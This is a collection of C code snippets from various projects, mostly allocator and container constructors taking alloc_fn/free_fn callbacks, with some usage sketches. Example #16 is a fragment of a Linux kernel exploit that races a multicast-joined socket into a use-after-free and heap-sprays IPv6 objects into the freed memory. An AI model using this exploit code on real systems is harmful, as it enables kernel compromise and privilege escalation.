Example #1
/*{{{  static StrPoolP strpool_create(StrPoolI initial_image_allocated_size, etc. */
static StrPoolP
strpool_create (StrPoolI initial_image_allocated_size,
		StrPoolI amount_to_increase_image_allocation_by,
		void *(*alloc_fn) (size_t size, void *user_data),
		void (*free_fn) (void *block, size_t size, void *user_data),
		void *user_data)
{
	StrPoolP result;
	result = alloc_fn (sizeof (struct StrPool), user_data);
	if (result != NULL) {
		if (initial_image_allocated_size == 0)
			initial_image_allocated_size = 1;
		result->image = alloc_fn ((size_t) initial_image_allocated_size, user_data);
		if (result->image != NULL) {
			result->image_len = 1;
			result->image[0] = '\0';
			result->image_allocated_size = initial_image_allocated_size;
			result->amount_to_increase_image_allocation_by = amount_to_increase_image_allocation_by;
			result->alloc_fn = alloc_fn;
			result->free_fn = free_fn;
		} else {
			free_fn (result, sizeof (struct StrPool), user_data);
			result = NULL;
		}
	}
	return result;
}
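
The callback signatures above line up directly with malloc and free, so a minimal pair of wrappers is all a caller needs. The sketch below is illustrative only: str_alloc/str_free are made-up names, the sizes are arbitrary, and since strpool_create is static the call would sit in the same translation unit, which also supplies StrPoolP and StrPoolI.

#include <stdlib.h>

/* Illustrative malloc-backed callbacks; user_data is unused here but could
   carry an arena, a statistics block, or an error sink. */
static void *str_alloc (size_t size, void *user_data)
{
	(void) user_data;
	return malloc (size);
}

static void str_free (void *block, size_t size, void *user_data)
{
	(void) size;
	(void) user_data;
	free (block);
}

/* Elsewhere in the same file, e.g.:
   StrPoolP pool = strpool_create (256, 256, str_alloc, str_free, NULL);  */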
Example #2
/*@out@*/ RBT_ROOT *rbt_init( void *data ,
                              rbt_alloc_fn alloc_fn ,
                              rbt_free_fn free_fn ,
                              rbt_compare_keys_fn compare_keys ,
                              mm_size_t key_length ,
                              mm_size_t node_data_size )
{
  RBT_ROOT *root = alloc_fn( sizeof( RBT_ROOT ) , data ) ;

  if ( root == NULL ) {
    return NULL ;
  }

  root->node = &( root->nil ) ;
  root->nil.key = ( uintptr_t )0 ;
  root->nil.left = NULL ;
  root->nil.right = NULL ;
  root->nil.p = NULL ;
  root->nil.data = NULL ;
  root->nil.red = FALSE ;
  root->count = 0 ;
  root->compare_keys = compare_keys ;
  root->alloc_fn = alloc_fn ;
  root->free_fn = free_fn ;
  root->key_length = key_length ;
  root->node_data_size = node_data_size ;
  root->data = data ;

  return root ;
}
Example #3
XArray* VG_(newXA) ( void*(*alloc_fn)(SizeT), 
                     void(*free_fn)(void*),
                     Word elemSzB )
{
   struct _XArray* xa;
   /* Implementation relies on Word being signed and (possibly)
      on SizeT being unsigned. */
   vg_assert( sizeof(Word) == sizeof(void*) );
   vg_assert( ((Word)(-1)) < ((Word)(0)) );
   vg_assert( ((SizeT)(-1)) > ((SizeT)(0)) );
   /* check user-supplied info .. */
   vg_assert(alloc_fn);
   vg_assert(free_fn);
   vg_assert(elemSzB > 0);
   xa = alloc_fn( sizeof(struct _XArray) );
   vg_assert(xa);
   xa->alloc     = alloc_fn;
   xa->free      = free_fn;
   xa->cmpFn     = NULL;
   xa->elemSzB   = elemSzB;
   xa->usedsizeE = 0;
   xa->totsizeE  = 0;
   xa->sorted    = False;
   xa->arr       = NULL;
   return xa;
}
Example #4
DedupPoolAlloc* VG_(newDedupPA) ( SizeT  poolSzB,
                                  SizeT  eltAlign,
                                  void*  (*alloc_fn)(const HChar*, SizeT),
                                  const  HChar* cc,
                                  void   (*free_fn)(void*) )
{
   DedupPoolAlloc* ddpa;
   vg_assert(poolSzB >= eltAlign);
   vg_assert(poolSzB >= 100); /* let's say */
   vg_assert(poolSzB >= 10*eltAlign); /* let's say */
   vg_assert(alloc_fn);
   vg_assert(cc);
   vg_assert(free_fn);
   ddpa = alloc_fn(cc, sizeof(*ddpa));
   VG_(memset)(ddpa, 0, sizeof(*ddpa));
   ddpa->poolSzB  = poolSzB;
   ddpa->fixedSzb = 0;
   ddpa->eltAlign = eltAlign;
   ddpa->alloc_fn = alloc_fn;
   ddpa->cc       = cc;
   ddpa->free_fn  = free_fn;
   ddpa->pools    = VG_(newXA)( alloc_fn, cc, free_fn, sizeof(void*) );

   ddpa->ht_elements = VG_(HT_construct) (cc);
   ddpa->ht_node_pa = VG_(newPA) ( sizeof(ht_node),
                                   1000,
                                   alloc_fn,
                                   cc,
                                   free_fn);
   ddpa->curpool = NULL;
   ddpa->curpool_limit = NULL;
   ddpa->curpool_free = NULL;

   return ddpa;
}
Example #5
RState* r_state_new (RAllocFunc alloc_fn, rpointer aux)
{
    RState* r;
    RState zero = { { 0 } };

    r = alloc_fn (NULL, NULL, sizeof (RState));

    if (!r)
        goto exit;

    *r = zero;

    /* Initialize memory allocator */
    r->alloc_fn = alloc_fn;
    r->alloc_aux = aux;

    /* Initialize error handling facilities */
    r->last_error = R_UNDEFINED;

    gc_init (r);

    init_builtin_types (r);
    init_global_objects (r);

    vm_init (r);
    gc_enable (r);

exit:
    return r;
}
Example #6
XArray* VG_(newXA) ( Alloc_Fn_t alloc_fn,
                     const HChar* cc,
                     Free_Fn_t free_fn,
                     Word elemSzB )
{
   XArray* xa;
   /* Implementation relies on Word being signed and (possibly)
      on SizeT being unsigned. */
   vg_assert( sizeof(Word) == sizeof(void*) );
   vg_assert( ((Word)(-1)) < ((Word)(0)) );
   vg_assert( ((SizeT)(-1)) > ((SizeT)(0)) );
   /* check user-supplied info .. */
   vg_assert(alloc_fn);
   vg_assert(free_fn);
   vg_assert(elemSzB > 0);
   xa = alloc_fn( cc, sizeof(struct _XArray) );
   xa->alloc_fn  = alloc_fn;
   xa->cc        = cc;
   xa->free_fn   = free_fn;
   xa->cmpFn     = NULL;
   xa->elemSzB   = elemSzB;
   xa->usedsizeE = 0;
   xa->totsizeE  = 0;
   xa->sorted    = False;
   xa->arr       = NULL;
   return xa;
}
Example #7
PoolAlloc* VG_(newPA) ( UWord  elemSzB,
                        UWord  nPerPool,
                        void*  (*alloc_fn)(const HChar*, SizeT),
                        const  HChar* cc,
                        void   (*free_fn)(void*) )
{
   PoolAlloc* pa;
   vg_assert(0 == (elemSzB % sizeof(UWord)));
   vg_assert(elemSzB >= sizeof(UWord));
   vg_assert(nPerPool >= 100); /* let's say */
   vg_assert(alloc_fn);
   vg_assert(cc);
   vg_assert(free_fn);
   pa = alloc_fn(cc, sizeof(*pa));
   VG_(memset)(pa, 0, sizeof(*pa));
   pa->nrRef    = 0;
   pa->elemSzB  = elemSzB;
   pa->nPerPool = nPerPool;
   pa->pools    = NULL;
   pa->alloc_fn = alloc_fn;
   pa->cc       = cc;
   pa->free_fn  = free_fn;
   pa->pools    = VG_(newXA)( alloc_fn, cc, free_fn, sizeof(void*) );
   pa->nextFree = NULL;

   return pa;
}
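
Within Valgrind, this trio of parameters is normally filled with the core heap functions, whose shapes match exactly: VG_(malloc) takes a cost-centre string plus a size, and VG_(free) takes just the pointer. Below is a rough usage sketch, assuming the usual pool companions VG_(allocEltPA)/VG_(freeEltPA)/VG_(deletePA) from the same interface; the element size and cost-centre label are arbitrary.

/* Sketch: word-sized elements, 1000 per pool, backed by the core allocator.
   "example.cc" is a made-up cost-centre label. */
PoolAlloc* pa = VG_(newPA)( sizeof(UWord), 1000,
                            VG_(malloc), "example.cc", VG_(free) );
UWord* p = VG_(allocEltPA)( pa );   /* take one element from the pool */
VG_(freeEltPA)( pa, p );            /* hand it back */
VG_(deletePA)( pa );                /* release the pools themselves */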
Example #8
int __sg_alloc_table(struct sg_table *table, unsigned int nents,
		     unsigned int max_ents, gfp_t gfp_mask,
		     sg_alloc_fn *alloc_fn)
{
	struct scatterlist *sg, *prv;
	unsigned int left;

#ifndef ARCH_HAS_SG_CHAIN
	BUG_ON(nents > max_ents);
#endif

	memset(table, 0, sizeof(*table));

	left = nents;
	prv = NULL;
	do {
		unsigned int sg_size, alloc_size = left;

		if (alloc_size > max_ents) {
			alloc_size = max_ents;
			sg_size = alloc_size - 1;
		} else
			sg_size = alloc_size;

		left -= sg_size;

		sg = alloc_fn(alloc_size, gfp_mask);
		if (unlikely(!sg)) {
			if (prv)
				table->nents = ++table->orig_nents;

			return -ENOMEM;
		}

		sg_init_table(sg, alloc_size);
		table->nents = table->orig_nents += sg_size;

		if (prv)
			sg_chain(prv, max_ents, sg);
		else
			table->sgl = sg;

		if (!left)
			sg_mark_end(&sg[sg_size - 1]);

		gfp_mask &= ~__GFP_WAIT;
		gfp_mask |= __GFP_HIGH;
		prv = sg;
	} while (left);

	return 0;
}
Example #9
int  ci_buddy_ctor2(ci_buddy_allocator* b, unsigned order,
		    void* (*alloc_fn)(size_t), void (*free_fn)(void*))
{
  unsigned o;

  ci_assert(b);

  b->order = order;
  b->free_lists = (ci_dllist*) alloc_fn((order+1) * sizeof(ci_dllist));
  if( b->free_lists == 0 )  goto fail1;

  b->links = (ci_dllink*) alloc_fn(ci_pow2(order) * sizeof(ci_dllink));
  if( b->links == 0 )  goto fail2;

  b->orders = (ci_uint8*) alloc_fn(ci_pow2(order));
  if( b->orders == 0 )  goto fail3;

  CI_DEBUG(CI_ZERO_ARRAY(b->links, ci_pow2(order)));

  for( o = 0; o <= b->order; ++o )
    ci_dllist_init(b->free_lists + o);

  ci_dllist_push(FL(b, b->order), ADDR_TO_LINK(b, 0));
  ci_assert(b->order < 255);	
  b->orders[0] = (ci_uint8)b->order;

  ci_assert(!IS_BUSY(b, LINK_TO_ADDR(b, ci_dllist_head(FL(b, b->order)))));

  return 0;

 fail3:
  free_fn(b->links);
 fail2:
  free_fn(b->free_lists);
 fail1:
  return -ENOMEM;
}
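
Because the callback types here are plain void *(*)(size_t) and void (*)(void *), the standard allocator can be passed straight through with no wrapper. A minimal sketch, assuming ci_buddy_allocator comes from the surrounding headers and with an arbitrary order of 10:

#include <stdlib.h>

static int make_buddy(ci_buddy_allocator* b)
{
  /* malloc and free plug in directly because their prototypes match the
     callback types exactly; returns 0 on success, -ENOMEM on failure. */
  return ci_buddy_ctor2(b, 10, malloc, free);
}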
Example #10
int prealloc_buffers(struct vdisk_dev *dev)
{
	int i, c, res = 0;

	if (sgv_disable_clustered_pool)
		c = 0;
	else
		c = 1;

	do {
		for (i = 0; i < prealloc_buffers_num; i++) {
			union scst_user_prealloc_buffer pre;

			memset(&pre, 0, sizeof(pre));
			pre.in.pbuf = (unsigned long)alloc_fn(prealloc_buffer_size);
			pre.in.bufflen = prealloc_buffer_size;
			pre.in.for_clust_pool = c;

			if (pre.in.pbuf == 0) {
				res = errno;
				PRINT_ERROR("Unable to prealloc buffer: %s",
					strerror(res));
				goto out;
			}

			res = ioctl(dev->scst_usr_fd, SCST_USER_PREALLOC_BUFFER, &pre);
			if (res != 0) {
				res = errno;
				PRINT_ERROR("Unable to send prealloced buffer: %s",
					strerror(res));
				free((void *)(unsigned long)pre.in.pbuf);
				goto out;
			}
			TRACE_MEM("Prealloced buffer cmd_h %x", pre.out.cmd_h);
		}
		c--;
	} while (c >= 0);

out:
	return res;
}
Example #11
struct smb_signing_state *smb_signing_init_ex(TALLOC_CTX *mem_ctx,
					      bool allowed,
					      bool desired,
					      bool mandatory,
					      void *(*alloc_fn)(TALLOC_CTX *, size_t),
					      void (*free_fn)(TALLOC_CTX *, void *))
{
	struct smb_signing_state *si;

	if (alloc_fn) {
		void *p = alloc_fn(mem_ctx, sizeof(struct smb_signing_state));
		if (p == NULL) {
			return NULL;
		}
		memset(p, 0, sizeof(struct smb_signing_state));
		si = (struct smb_signing_state *)p;
		si->mem_ctx = mem_ctx;
		si->alloc_fn = alloc_fn;
		si->free_fn = free_fn;
	} else {
		si = talloc_zero(mem_ctx, struct smb_signing_state);
		if (si == NULL) {
			return NULL;
		}
	}

	if (mandatory) {
		desired = true;
	}

	if (desired) {
		allowed = true;
	}

	si->allowed = allowed;
	si->desired = desired;
	si->mandatory = mandatory;

	return si;
}
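
The NULL-callback branch means callers that already live in a talloc world need no wrappers at all: leaving alloc_fn and free_fn NULL selects the talloc_zero path on the supplied context. A minimal sketch of that default path:

/* Sketch: signing state owned by mem_ctx, default talloc allocation. */
static struct smb_signing_state *make_signing(TALLOC_CTX *mem_ctx)
{
	/* allowed=true, desired=false, mandatory=false; the NULL callbacks
	   select the talloc_zero branch above. */
	return smb_signing_init_ex(mem_ctx, true, false, false, NULL, NULL);
}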
Example #12
/*
 * Create a new NDL3Net object. Stores alloc_fn and free_fn, which will be
 * passed userdata in later calls.
 */
NDL3Net * NDL3_new(NDAlloc alloc_fn, NDFree free_fn, void * userdata) {
  if (alloc_fn == NULL) {
    alloc_fn = &ND_malloc;
  }
  if (free_fn == NULL) {
    free_fn = &ND_free;
  }
  NDL3Net * net = (NDL3Net *) alloc_fn(sizeof(NDL3Net), userdata);
  if (net == 0) {
    return 0;
  }
  for (int i = 0; i < NDL3_MAXPORTS; i++) {
    net->ports[i].num = 0;
  }
  net->userdata = userdata;
  net->alloc = alloc_fn;
  net->free = free_fn;
  net->time = 0;
  net->port_idx_last_serviced = 0;
  net->last_error = 0;
  return net;
}
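
Judging from the call above, NDAlloc takes a size plus the stored userdata, and NDFree presumably mirrors it; because NULL callbacks fall back to ND_malloc/ND_free, the simplest construction needs no callbacks at all. A sketch under those assumptions (my_alloc and my_free are made-up names, and the exact NDFree shape is a guess):

#include <stdlib.h>

/* Assumed callback shapes, inferred from alloc_fn(sizeof(NDL3Net), userdata). */
static void * my_alloc(size_t size, void * userdata) {
  (void) userdata;
  return malloc(size);
}

static void my_free(void * ptr, void * userdata) {
  (void) userdata;
  free(ptr);
}

/* Either wire in custom callbacks:
     NDL3Net * net = NDL3_new(my_alloc, my_free, NULL);
   or rely on the ND_malloc/ND_free defaults:
     NDL3Net * net = NDL3_new(NULL, NULL, NULL);                  */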
Example #13
/*{{{  ProfTab *proftab_create (ProfTabContents contents, etc. */
ProfTab *proftab_create (ProfTabContents contents,
		void *alloc_fn (size_t size, void *user_data),
		void free_fn (void *block, size_t size, void *user_data),
		void *user_data)
{
	ProfTab *table = (ProfTab *) alloc_fn (sizeof (ProfTab), user_data);
	table->alloc_fn = alloc_fn;
	table->free_fn = free_fn;
	table->user_data = user_data;
	table->contents = contents;
	table->count_table_size = 0;
	table->strpool = strpool_create (PROFTAB_INITIAL_STRPOOL_SIZE, PROFTAB_STRPOOL_SIZE_INCREMENT, alloc_fn, free_fn, user_data);
	table->entry_list_head = NULL;
	table->entry_list_tail = NULL;
	if (cgraph_profiling || sampling_profiling) {
		int i;
		RoutineInfoEntry **hash_table;
		table->rout_hash_table = memalloc (ROUTINE_INFO_HASH_TABLE_SIZE * sizeof (table->rout_hash_table));
		hash_table = table->rout_hash_table;

		for (i = 0; i < ROUTINE_INFO_HASH_TABLE_SIZE; i++)
			hash_table[i] = NULL;
	} else
		table->rout_hash_table = NULL;
	return table;
}
Example #14
RangeMap* VG_(newRangeMap) ( void*(*alloc_fn)(const HChar*,SizeT), 
                             const HChar* cc,
                             void(*free_fn)(void*),
                             UWord initialVal )
{
   /* check user-supplied info .. */
   vg_assert(alloc_fn);
   vg_assert(free_fn);
   RangeMap* rm = alloc_fn(cc, sizeof(RangeMap));
   rm->alloc_fn = alloc_fn;
   rm->cc       = cc;
   rm->free_fn  = free_fn;
   rm->ranges = VG_(newXA)( alloc_fn, cc, free_fn, sizeof(Range) );
   /* Add the initial range */
   Range r;
   r.key_min = UWORD_MIN;
   r.key_max = UWORD_MAX;
   r.val     = initialVal;
   Word i = VG_(addToXA)(rm->ranges, &r);
   vg_assert(i == 0);
   vg_assert(VG_(sizeXA)(rm->ranges) == 1);
   /* */
   return rm;
}
Example #15
/**
 * __sg_alloc_table - Allocate and initialize an sg table with given allocator
 * @table:	The sg table header to use
 * @nents:	Number of entries in sg list
 * @max_ents:	The maximum number of entries the allocator returns per call
 * @gfp_mask:	GFP allocation mask
 * @alloc_fn:	Allocator to use
 *
 * Description:
 *   This function returns a @table @nents long. The allocator is
 *   defined to return scatterlist chunks of maximum size @max_ents.
 *   Thus if @nents is bigger than @max_ents, the scatterlists will be
 *   chained in units of @max_ents.
 *
 * Notes:
 *   If this function returns non-0 (eg failure), the caller must call
 *   __sg_free_table() to cleanup any leftover allocations.
 *
 **/
int __sg_alloc_table(struct sg_table *table, unsigned int nents,
		     unsigned int max_ents, gfp_t gfp_mask,
		     sg_alloc_fn *alloc_fn)
{
	struct scatterlist *sg, *prv;
	unsigned int left;
	unsigned int total_alloc = 0;

#ifndef ARCH_HAS_SG_CHAIN
	BUG_ON(nents > max_ents);
#endif

	memset(table, 0, sizeof(*table));

	left = nents;
	prv = NULL;
	do {
		unsigned int sg_size, alloc_size = left;

		if (alloc_size > max_ents) {
			alloc_size = max_ents;
			sg_size = alloc_size - 1;
		} else
			sg_size = alloc_size;

		left -= sg_size;

		sg = alloc_fn(alloc_size, gfp_mask);
		if (unlikely(!sg)) {
			table->orig_nents = total_alloc;
			/* mark the end of previous entry */
			sg_mark_end(&prv[alloc_size - 1]);
			return -ENOMEM;
		}

		total_alloc += alloc_size;

		sg_init_table(sg, alloc_size);
		table->nents = table->orig_nents += sg_size;

		/*
		 * If this is the first mapping, assign the sg table header.
		 * If this is not the first mapping, chain previous part.
		 */
		if (prv)
			sg_chain(prv, max_ents, sg);
		else
			table->sgl = sg;

		/*
		 * If no more entries after this one, mark the end
		 */
		if (!left)
			sg_mark_end(&sg[sg_size - 1]);

		/*
		 * only really needed for mempool backed sg allocations (like
		 * SCSI), a possible improvement here would be to pass the
		 * table pointer into the allocator and let that clear these
		 * flags
		 */
		gfp_mask &= ~__GFP_WAIT;
		gfp_mask |= __GFP_HIGH;
		prv = sg;
	} while (left);

	return 0;
}
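
For reference, the allocator the kernel itself wires into this hook, sg_kmalloc() in lib/scatterlist.c, simply returns one chunk of struct scatterlist per call (with a full-page special case omitted here). A stripped-down sketch of a compatible sg_alloc_fn, with my_sg_alloc as a made-up name:

#include <linux/scatterlist.h>
#include <linux/slab.h>

/* Sketch of an sg_alloc_fn-compatible chunk allocator: nents entries,
 * honouring whatever gfp_mask __sg_alloc_table passes down. */
static struct scatterlist *my_sg_alloc(unsigned int nents, gfp_t gfp_mask)
{
	return kmalloc_array(nents, sizeof(struct scatterlist), gfp_mask);
}

/* A caller would then build a chained table along the lines of:
 *   ret = __sg_alloc_table(&table, nents, SG_MAX_SINGLE_ALLOC,
 *                          GFP_KERNEL, my_sg_alloc);
 */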
Example #16
void *free_fn(void *arg)
{
    int sockfd, i;

    struct sockaddr_in s = { 
        .sin_family = AF_INET, 
        .sin_port = htons(PORT),
        .sin_addr = inet_addr("127.0.0.1"),
    };
    printf("[+] %s()\n", __func__);
    printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());

    while(!server_init)
        usleep(1);
    // nanosleep({tv_sec=0, tv_nsec=1000}, NULL) = 0  
#define connect_times 2
    for ( i = 0 ; i < connect_times ; i++ )//while(1)
    {
        sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);

        //printf("%s(), sockfd : %d\n", __func__, sockfd);
        if (connect(sockfd, (struct sockaddr*)&s, sizeof s ) == 0 ) {
            printf("[+] %d-th client connected successfully...\n", i);
            if ( close(sockfd) != 0 )
                err(-1, "%s(), close(sockfd)\n", __func__);
            
            client_finish=true;
        }    
    }   
    pthread_exit(0);
}

int ser_sockfd;

void *alloc_fn(void *arg)
{
    struct group_req req;
    int ret, i;         // file descriptor for socket
    struct sockaddr_in gg = { 
        .sin_family = AF_INET, 
        .sin_port = htons(PORT),
        .sin_addr = inet_addr("224.0.0.0"), // multicast address
    };
    printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());

    ser_sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC , IPPROTO_IP);

    req.gr_interface = 1;
    memcpy(&req.gr_group, &gg, sizeof gg);

    if (setsockopt(ser_sockfd, SOL_IP, MCAST_JOIN_GROUP, &req, sizeof req) == -1)
        warn("setsockopt(SO_REUSEADDR)");

    bind(ser_sockfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));

    listen(ser_sockfd, 2);
    
    pthread_t free1_t;
    // Create a client thread to connect.
    if ( pthread_create(&free1_t, NULL, free_fn, NULL))
        err(1, "free1_t");

    server_init = true;

    int addr_len = sizeof serv_addr;
#define accept_times 2
    for ( i = 0 ; i < accept_times ; i++ )
    {
        conntfd[i] = accept4(ser_sockfd, NULL, NULL, 0);
        
        if ( conntfd[i] >= 0 ) 
                printf("[+] %d-th accept() has have executed...\n", i);
        else 
            err(-1, "accept");
    }   
    while ( client_finish == false );
    server_finish=true;

    int c, times = 0;
    for ( c = 0 ; c < 30 ; c++, times = 0 ) {  
        while(prepare_spray_obj(
                    ipv6_fd[c], 
                    &gr_spray, 
                    &in6_spray, 
                    times++) == 0
        );
    }
    bind_cpu_on(cpuid);
    bind_cpu_on(cpuid);

    // close (conntfd[0]) caused by accept4()
    // Trigger kernel after defrag spray.
    if ( conntfd[0] ) 
        close(conntfd[0]);
    else 
        err(-1, "close(conntfd[0])");

    for ( c = 0 ; c < defrag_num ; c++ ) {
       if ( close(ipv6_fd[c]) != 0) 
               err(-1, "close(ipv6_fd[%d] = %d)", c, ipv6_fd[c]);
    }
    
#if real_spray
    
    for ( c = 0 ; c < spray_times ; c++, times = 0 ) {
        while(prepare_spray_obj(
            ipv6_fd_500[c],
            &gr_spray,
            &in6_spray,
            times++) == 0
        );
    }
    printf("[*] spray for the hole... %d times\n", spray_times);
#endif 
    return NULL;

}

static int trigger()
{
    pthread_t alloc_t, free1_t, free2_t;
    int sockfd;
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(PORT);
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    int i, times = 1;

    alloc_fn(NULL);

    bind_cpu_on(cpuid);
    printf("[+] Current cpu : %d After triggered and sprayed 500 times.\n", cpuid);
#if FORKCHILD
    printf("[*] kill chilren by fork()?\n");
    for ( i = 0 ; i < children_num ; i++ )
    {
        printf("kill pid : %d\n", child[i]);
        kill(child[i], SIGKILL);
    }
    wait(NULL);
#endif 

    printf("[+] All killed\n");

    return 0;
}
int bind_cpu_on(int cpuid) 
{
    int i,now_cpuid = -1;
    /*
    if ( cpuid > sysconf(_SC_NPROCESSORS_CONF) -1 )
        err(-1,"cpuid is over...");
    */
    cpu_set_t get;
    CPU_ZERO(&mask);
    CPU_SET(cpuid, &mask);
    if (cpuid == 7)
        return sched_setaffinity(0 /* pid self */, sizeof(mask), &mask);

    while( cpuid != now_cpuid ) {
        sched_setaffinity(0 /* pid self */, sizeof(mask), &mask);
        now_cpuid = sched_getcpu();
    }
    return now_cpuid;
}
Example #17
/**
 * __sg_alloc_table - Allocate and initialize an sg table with given allocator
 * @table:	The sg table header to use
 * @nents:	Number of entries in sg list
 * @max_ents:	The maximum number of entries the allocator returns per call
 * @gfp_mask:	GFP allocation mask
 * @alloc_fn:	Allocator to use
 *
 * Description:
 *   This function returns a @table @nents long. The allocator is
 *   defined to return scatterlist chunks of maximum size @max_ents.
 *   Thus if @nents is bigger than @max_ents, the scatterlists will be
 *   chained in units of @max_ents.
 *
 * Notes:
 *   If this function returns non-0 (eg failure), the caller must call
 *   __sg_free_table() to cleanup any leftover allocations.
 *
 **/
int __sg_alloc_table(struct sg_table *table, unsigned int nents,
		     unsigned int max_ents, gfp_t gfp_mask,
		     sg_alloc_fn *alloc_fn)
{
	struct scatterlist *sg, *prv;
	unsigned int left;

#ifndef ARCH_HAS_SG_CHAIN
	if (WARN_ON_ONCE(nents > max_ents))
		return -EINVAL;
#endif

	memset(table, 0, sizeof(*table));

	left = nents;
	prv = NULL;
	do {
		unsigned int sg_size, alloc_size = left;

		if (alloc_size > max_ents) {
			alloc_size = max_ents;
			sg_size = alloc_size - 1;
		} else
			sg_size = alloc_size;

		left -= sg_size;

		sg = alloc_fn(alloc_size, gfp_mask);
		if (unlikely(!sg)) {
			/*
			 * Adjust entry count to reflect that the last
			 * entry of the previous table won't be used for
			 * linkage.  Without this, sg_kfree() may get
			 * confused.
			 */
			if (prv)
				table->nents = ++table->orig_nents;

			return -ENOMEM;
		}

		sg_init_table(sg, alloc_size);
		table->nents = table->orig_nents += sg_size;

		/*
		 * If this is the first mapping, assign the sg table header.
		 * If this is not the first mapping, chain previous part.
		 */
		if (prv)
			sg_chain(prv, max_ents, sg);
		else
			table->sgl = sg;

		/*
		 * If no more entries after this one, mark the end
		 */
		if (!left)
			sg_mark_end(&sg[sg_size - 1]);

		prv = sg;
	} while (left);

	return 0;
}